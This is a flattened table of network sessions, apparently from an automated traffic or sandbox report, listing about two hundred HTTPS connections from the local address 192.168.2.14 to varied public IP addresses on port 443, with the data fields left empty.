                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11908192.168.2.1446266188.21.2.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11909192.168.2.144259878.194.36.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11910192.168.2.144690237.84.112.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11911192.168.2.143689879.54.238.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11912192.168.2.1435120122.248.3.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11913192.168.2.143957675.208.150.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11914192.168.2.145796423.73.191.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11915192.168.2.145928075.127.23.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11916192.168.2.1450142223.51.28.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11917192.168.2.145314024.24.39.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11918192.168.2.145484454.167.70.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11919192.168.2.1444026186.237.143.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11920192.168.2.1442098194.183.77.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11921192.168.2.1457714211.143.205.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11922192.168.2.143507020.138.28.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11923192.168.2.1441406188.119.35.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11924192.168.2.1445292207.109.96.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11925192.168.2.1451076105.108.140.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11926192.168.2.1435170212.31.85.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11927192.168.2.1450356161.15.237.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11928192.168.2.1449034159.178.69.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11929192.168.2.144851872.63.130.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11930192.168.2.1447384165.91.18.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11931192.168.2.1447316105.198.212.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11932192.168.2.145791868.247.91.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11933192.168.2.1452974159.112.237.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11934192.168.2.143679042.244.214.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11935192.168.2.1455080149.213.60.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11936192.168.2.1441748149.96.81.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11937192.168.2.1456024117.238.118.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11938192.168.2.1436848105.106.99.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11939192.168.2.1437166220.233.171.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11940192.168.2.145576899.71.198.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11941192.168.2.144682099.177.10.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11942192.168.2.145698014.102.128.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11943192.168.2.143584654.70.117.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11944192.168.2.144564061.128.190.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11945192.168.2.1444122140.23.97.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11946192.168.2.1440350119.204.210.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11947192.168.2.1452918188.98.11.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11948192.168.2.1454850135.95.228.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11949192.168.2.144518844.244.33.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11950192.168.2.1444212207.240.207.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11951192.168.2.1441574165.137.243.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11952192.168.2.1456740134.111.2.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11953192.168.2.145706858.113.191.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11954192.168.2.145214435.58.137.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11955192.168.2.1446412153.228.114.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11956192.168.2.144094477.6.44.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11957192.168.2.1456384110.191.57.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11958192.168.2.1443628124.13.40.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11959192.168.2.1444144213.175.86.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11960192.168.2.1451752149.193.146.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11961192.168.2.143818814.105.41.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11962192.168.2.144466236.2.169.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11963192.168.2.1441956105.224.24.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11964192.168.2.145734625.209.91.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11965192.168.2.145536685.25.125.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11966192.168.2.1441314168.99.119.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11967192.168.2.1445532176.21.196.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11968192.168.2.144571882.247.234.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11969192.168.2.144784638.39.215.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11970192.168.2.143786632.132.187.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11971192.168.2.1437590149.183.17.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11972192.168.2.1460274106.195.137.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11973192.168.2.144258863.89.188.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11974192.168.2.1453798184.213.137.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11975192.168.2.1441608163.236.103.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11976192.168.2.1452278138.28.114.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11977192.168.2.1452674179.110.26.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11978192.168.2.1445898173.108.41.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11979192.168.2.144123459.163.242.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11980192.168.2.1457456141.145.172.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11981192.168.2.1450002161.205.69.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11982192.168.2.1434876148.6.40.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11983192.168.2.1450614114.124.20.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11984192.168.2.1435888204.9.85.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11985192.168.2.1460386165.89.169.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11986192.168.2.143531247.207.246.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11987192.168.2.1438970133.57.159.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11988192.168.2.145661671.166.9.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11989192.168.2.144345697.244.71.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11990192.168.2.1454982189.91.194.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11991192.168.2.145686232.242.185.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11992192.168.2.1458826131.111.166.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11993192.168.2.1440244191.13.130.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11994192.168.2.145831847.208.165.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11995192.168.2.143748296.40.233.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11996192.168.2.1448394114.121.199.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11997192.168.2.143393243.78.172.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11998192.168.2.145773095.206.71.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11999192.168.2.145345274.23.55.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12000192.168.2.1449970101.113.56.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12001192.168.2.143631877.212.62.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12002192.168.2.1459962198.47.55.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12003192.168.2.1449144129.104.230.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12004192.168.2.144868295.251.85.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12005192.168.2.1451236119.45.240.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12006192.168.2.145033667.149.131.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12007192.168.2.1452176137.32.119.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12008192.168.2.1441098138.75.162.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12009192.168.2.1449276166.244.207.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12010192.168.2.143417699.153.200.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12011192.168.2.1444760154.10.164.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12012192.168.2.1437594147.198.252.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12013192.168.2.1457908179.91.196.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12014192.168.2.1454112170.43.2.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12015192.168.2.1445490210.155.221.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12016192.168.2.1434130100.30.144.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12017192.168.2.1449190220.153.80.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12018192.168.2.1456050187.195.40.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12019192.168.2.1437702141.190.146.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12020192.168.2.1440822105.33.239.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12021192.168.2.144315246.26.94.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12022192.168.2.1454762169.184.58.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12023192.168.2.146096661.169.75.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12024192.168.2.1449074200.14.201.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12025192.168.2.1450790162.84.193.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12026192.168.2.1453032212.21.110.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12027192.168.2.1453218163.120.137.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12028192.168.2.145644238.209.170.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12029192.168.2.145241065.111.96.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12030192.168.2.1436750141.226.3.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12031192.168.2.1438734115.13.64.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12032192.168.2.144701454.221.150.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12033192.168.2.144679052.221.71.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12034192.168.2.1458040120.79.187.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12035192.168.2.1443424141.182.8.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12036192.168.2.143975670.228.6.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12037192.168.2.1445010148.19.199.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12038192.168.2.1450536146.158.98.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12039192.168.2.145235268.156.178.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12040192.168.2.145629852.81.48.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12041192.168.2.1435416173.190.169.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12042192.168.2.143357471.198.228.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12043192.168.2.145963495.7.29.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12044192.168.2.145097614.84.85.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12045192.168.2.144134275.26.161.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12046192.168.2.144510438.161.41.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12047192.168.2.144757896.192.229.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12048192.168.2.1457236221.240.127.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12049192.168.2.143339886.249.134.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12050192.168.2.1451998100.56.24.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12051192.168.2.1460178180.245.222.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12052192.168.2.1457812113.38.252.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12053192.168.2.145481877.85.246.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12054192.168.2.14419841.227.152.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12055192.168.2.1442916177.170.46.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12056192.168.2.145308049.211.152.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12057192.168.2.144482684.149.50.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12058192.168.2.1439996199.178.81.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12059192.168.2.1452660202.204.216.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12060192.168.2.144822286.122.41.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12061192.168.2.145459238.96.73.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12062192.168.2.144187895.71.200.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12063192.168.2.145696834.176.187.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12064192.168.2.1438120204.108.164.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12065192.168.2.143482883.23.18.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12066192.168.2.1433800169.238.250.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12067192.168.2.145524246.173.240.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12068192.168.2.145903642.198.137.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12069192.168.2.1434432152.102.29.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12070192.168.2.1459338142.147.151.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12071192.168.2.1433854162.243.163.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12072192.168.2.143870244.105.132.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12073192.168.2.1438122142.209.37.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12074192.168.2.145282889.150.219.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12075192.168.2.1451340197.191.152.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12076192.168.2.1443160210.119.16.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12077192.168.2.1455134103.182.175.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12078192.168.2.14455621.129.110.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12079192.168.2.144389618.183.202.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12080192.168.2.145156040.208.37.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12081192.168.2.144009678.134.147.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12082192.168.2.1457326168.154.128.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12083192.168.2.1447232163.250.238.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12084192.168.2.1453124199.98.23.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12085192.168.2.1435746158.217.226.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12086192.168.2.145723214.200.101.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12087192.168.2.143374652.26.4.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12088192.168.2.1437140178.96.212.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12089192.168.2.143330660.122.248.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12090192.168.2.1451056117.138.132.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12091192.168.2.144242420.187.85.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12092192.168.2.1457314129.188.87.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12093192.168.2.143397638.53.73.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12094192.168.2.1442056139.163.163.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12095192.168.2.1459092196.145.255.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12096192.168.2.1441088152.30.173.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12097192.168.2.1456312112.232.113.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12098192.168.2.1456846219.108.168.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12099192.168.2.1439964177.197.44.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12100192.168.2.144932854.78.141.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12101192.168.2.1441114143.62.70.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12102192.168.2.143691095.249.142.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12103192.168.2.143542298.112.245.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12104192.168.2.1453000155.34.140.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12105192.168.2.143834288.163.74.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12106192.168.2.1445328178.151.173.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12107192.168.2.146097885.138.196.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12108192.168.2.1436422196.144.107.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12109192.168.2.145685691.24.21.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12110192.168.2.145565420.178.242.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12111192.168.2.143377877.195.222.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12112192.168.2.145664076.224.221.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12113192.168.2.143405013.126.162.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12114192.168.2.1455112188.83.167.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12115192.168.2.1456158148.154.174.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12116192.168.2.14441462.35.147.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12117192.168.2.144455664.66.201.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12118192.168.2.1438084218.27.10.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12119192.168.2.1454032191.121.119.108443
                                                        TimestampBytes transferredDirectionData


